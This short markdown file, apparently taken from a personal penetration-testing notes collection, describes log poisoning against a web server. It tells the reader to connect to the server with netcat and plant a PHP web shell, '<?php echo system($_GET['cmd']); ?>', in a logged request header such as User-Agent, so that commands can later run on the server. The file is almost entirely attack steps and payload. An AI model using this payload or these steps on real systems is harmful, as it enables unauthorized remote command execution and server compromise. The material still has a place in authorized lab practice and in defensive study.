H3llKa1ser/B00t2R00t/Web Application Penetration Testing/Log Poisoning.md

 Inject a simple web shell payload into a request header (e.g., User-Agent or Referer) that the web server will log.

+Connect with netcat on the webserver

+    nc IP PORT

+Inject the payload

 Payload:

     <?php echo system($_GET['cmd']); ?>